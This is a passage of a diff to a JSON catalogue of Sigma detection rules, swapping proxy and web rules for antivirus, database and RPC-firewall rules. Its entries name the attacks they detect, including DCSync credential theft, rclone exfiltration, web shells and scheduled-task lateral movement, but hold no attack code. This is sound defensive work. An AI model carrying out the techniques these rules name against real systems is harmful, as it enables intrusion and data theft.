"https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" ], "tags": [ - "attack.initial_access", - "attack.t1189", "attack.execution", - "attack.t1204.002", - "attack.defense_evasion", - "attack.t1036.005" + "attack.t1203", + "attack.command_and_control", + "attack.t1219" ] }, - "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", - "value": "Flash Player Update from Suspicious Location" + "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", + "value": "Antivirus Exploitation Framework Detection" }, { - "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", + "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", "meta": { "author": "Florian Roth", - "creation_date": "2018/06/05", + "creation_date": "2021/08/16", "falsepositive": [ - "Legitimate use of Telegram bots in the company" + "Unlikely" ], - "filename": "proxy_telegram_api.yml", - "level": "medium", - "logsource.category": "proxy", + "filename": "av_hacktool.yml", + "level": "high", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" + "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" ], "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.002" + "attack.execution", + "attack.t1204" ] }, - "uuid": 
"b494b165-6634-483d-8c47-2026a6c52372", - "value": "Telegram API Access" + "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", + "value": "Antivirus Hacktool Detection" }, { - "description": "Detects Turla ComRAT patterns", + "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", "meta": { - "author": "Florian Roth", - "creation_date": "2020/05/26", + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "proxy_turla_comrat.yml", + "filename": "av_webshell.yml", "level": "high", - "logsource.category": "proxy", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", + "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", + "https://github.com/tennc/webshell", + 
"https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" ], "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001", - "attack.g0010" - ] - }, - "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", - "value": "Turla ComRAT" - }, - { - "description": "Detects suspicious user agent strings used in APT malware in proxy logs", - "meta": { - "author": "Florian Roth, Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Old browsers" - ], - "filename": "proxy_ua_apt.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", - "value": "APT User Agent" - }, - { - "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/10", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_bitsadmin_susp_ip.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.defense_evasion", "attack.persistence", - "attack.t1197", - "attack.s0190" + "attack.t1505.003" ] }, - "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", - "value": "Bitsadmin to Uncommon IP Server Address" + "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", + "value": "Antivirus Web Shell Detection" }, { - "description": "Detects Bitsadmin connections to domains with uncommon TLDs", - "meta": { - "author": "Florian 
Roth, Tim Shelton", - "creation_date": "2019/03/07", - "falsepositive": [ - "Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca" - ], - "filename": "proxy_ua_bitsadmin_susp_tld.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/jhencinski/status/1102695118455349248", - "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190" - ] - }, - "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", - "value": "Bitsadmin to Uncommon TLD" - }, - { - "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", + "description": "Detects a highly relevant Antivirus alert that reports ransomware", "meta": { "author": "Florian Roth", - "creation_date": "2019/10/21", + "creation_date": "2022/05/12", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "proxy_ua_cryptominer.yml", - "level": "high", - "logsource.category": "proxy", + "filename": "av_ransomware.yml", + "level": "critical", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", - "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" + "https://www.nextron-systems.com/?s=antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.t1486" ] }, - "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", - "value": 
"Crypto Miner User Agent" + "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", + "value": "Antivirus Ransomware Detection" }, { - "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", + "description": "Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields", "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", + "author": "@juju4", + "creation_date": "2022/12/27", "falsepositive": [ - "Unknown" + "Inventory and monitoring activity", + "Vulnerability scanners", + "Legitimate applications" ], - "filename": "proxy_ua_frameworks.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", - "value": "Exploit Framework User Agent" - }, - { - "description": "Detects suspicious user agent strings user by hack tools in proxy logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_hacktool.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", - "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": 
"c42a3073-30fb-48ae-8c99-c23ada84b103", - "value": "Hack Tool User Agent" - }, - { - "description": "Detects suspicious user agent strings used by malware in proxy logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_malware.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "http://www.botopedia.org/search?searchword=scan&searchphrase=all", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", - "https://perishablepress.com/blacklist/ua-2013.txt", - "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", - "value": "Malware User Agent" - }, - { - "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", - "meta": { - "author": "Janantha Marasinghe", - "creation_date": "2022/10/18", - "falsepositive": [ - "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" - ], - "filename": "proxy_ua_rclone.yml", + "filename": "db_anomalous_query.yml", "level": "medium", - "logsource.category": "proxy", + "logsource.category": "database", "logsource.product": "No established product", "refs": [ - "https://rclone.org/", - "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" + "https://github.com/sqlmapproject/sqlmap", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/database/db_anomalous_query.yml" ], "tags": [ 
"attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", - "value": "Rclone Activity via Proxy" - }, - { - "description": "Detects suspicious malformed user agent strings in proxy logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_susp.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", - "value": "Suspicious User Agent" - }, - { - "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ua_susp_base64.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", - "value": "Suspicious Base64 User Agent" - }, - { - "description": "Detects Ursnif C2 traffic.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ursnif_malware_c2_url.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - 
"https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" - ], - "tags": [ "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1204.002", - "attack.command_and_control", - "attack.t1071.001" + "attack.privilege_escalation", + "attack.t1190", + "attack.t1505.001" ] }, - "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", - "value": "Ursnif Malware C2 URL Pattern" + "uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5", + "value": "Suspicious SQL Query" }, { - "description": "Detects download of Ursnif malware done by dropper documents.", + "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", "meta": { "author": "Thomas Patzke", - "creation_date": "2019/12/19", + "creation_date": "2017/08/06", "falsepositive": [ - "Unknown" + "Application bugs" ], - "filename": "proxy_ursnif_malware_download_url.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" - ], - "tags": "No established tags" - }, - "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", - "value": "Ursnif Malware Download URL Pattern" - }, - { - "description": "Detects a segmentation fault error message caused by a creashing apache worker process", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/28", - "falsepositive": [ - "Unknown" - ], - "filename": "web_apache_segfault.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "No established product", - "refs": [ - "http://www.securityfocus.com/infocus/1633", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.004" - ] - }, - "uuid": 
"1da8ce0b-855d-4004-8860-7d64d42063b1", - "value": "Apache Segmentation Fault" - }, - { - "description": "Detects an issue in apache logs that reports threading related errors", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/22", - "falsepositive": [ - "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" - ], - "filename": "web_apache_threading_error.yml", + "filename": "appframework_spring_exceptions.yml", "level": "medium", - "logsource.category": "No established category", - "logsource.product": "No established product", + "logsource.category": "application", + "logsource.product": "spring", "refs": [ - "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" - ], - "tags": "No established tags" - }, - "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", - "value": "Apache Threading Error" - }, - { - "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. 
(dot dot) in the class_key parameter.\n", - "meta": { - "author": "Subhash Popuri (@pbssubhash)", - "creation_date": "2021/08/25", - "falsepositive": [ - "Scanning from Nuclei", - "Unknown" - ], - "filename": "web_cve_2010_5278_exploitation_attempt.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" + "https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml" ], "tags": [ "attack.initial_access", "attack.t1190" ] }, - "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", - "value": "CVE-2010-5278 Exploitation Attempt" + "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", + "value": "Spring Framework Exceptions" }, { - "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", + "description": "Generic rule for SQL exceptions in Python according to PEP 249", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/19", + "author": "Thomas Patzke", + "creation_date": "2017/08/12", "falsepositive": [ - "Unknown" + "Application bugs" ], - "filename": "web_cve_2014_6287_hfs_rce.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "filename": "app_python_sql_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "python", "refs": [ - "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", - "https://www.exploit-db.com/exploits/39161", - "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" + "https://www.python.org/dev/peps/pep-0249/#exceptions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" ], "tags": [ "attack.initial_access", - "attack.t1190", - "attack.t1505.003", - "cve.2014.6287" + "attack.t1190" ] }, - "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", - "value": "Rejetto HTTP File Server RCE" + "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", + "value": "Python SQL Exceptions" }, { - "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", + "description": "Detects SQL error messages that indicate probing for an injection attack", + "meta": { + "author": "Bjoern Kimminich", + "creation_date": "2017/11/27", + "falsepositive": [ + "Application bugs" + ], + "filename": "app_sqlinjection_errors.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "sql", + "refs": [ + "http://www.sqlinjection.net/errors", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", + "value": "Suspicious SQL Error Messages" + }, + { + "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/08/06", + "falsepositive": [ + "Application bugs" + ], + "filename": "appframework_ruby_on_rails_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "ruby_on_rails", + "refs": [ + "http://guides.rubyonrails.org/action_controller_overview.html", + "http://edgeguides.rubyonrails.org/security.html", + "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", + 
"https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", + "value": "Ruby on Rails Framework Exceptions" + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sharphound_recon_account.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1087/", + "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" + ], + "tags": [ + "attack.t1087" + ] + }, + "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", + "value": "SharpHound Recon Account Discovery" + }, + { + "description": "Detects remote RPC calls to collect information", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administration of registry values" + ], + "filename": "rpc_firewall_remote_registry_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + 
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", + "value": "Remote Registry Recon" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_itaskschedulerservice_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", + "value": "Remote Schedule Task Recon via ITaskSchedulerService" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Administrative tasks on remote services" + ], + "filename": 
"rpc_firewall_remote_service_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1569/002/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1569.002" + ] + }, + "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", + "value": "Remote Server Service Abuse for Lateral Movement" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_atsvc_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://attack.mitre.org/techniques/T1053/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, 
+ "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", + "value": "Remote Schedule Task Lateral Movement via ATSvc" + }, + { + "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_dcsync_attack.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" + ], + "tags": [ + "attack.t1033" + ] + }, + "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", + "value": "Possible DCSync Attack" + }, + { + "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administrative tasks on Windows Events" + ], + "filename": "rpc_firewall_eventlog_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/zeronetworks/rpcfirewall", + "https://attack.mitre.org/tactics/TA0007/", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", + 
"value": "Remote Event Log Recon" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://attack.mitre.org/techniques/T1053/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", + "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" + }, + { + "description": "Detects remote RPC calls that performs remote DCOM operations. 
These could be abused for lateral movement via DCOM or WMI.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Some administrative tasks on remote host" + ], + "filename": "rpc_firewall_remote_dcom_or_wmi.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/zeronetworks/rpcfirewall", + "https://attack.mitre.org/techniques/T1021/003/", + "https://attack.mitre.org/techniques/T1047/", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003", + "attack.t1047" + ] + }, + "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", + "value": "Remote DCOM/WMI Lateral Movement" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sasec_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + 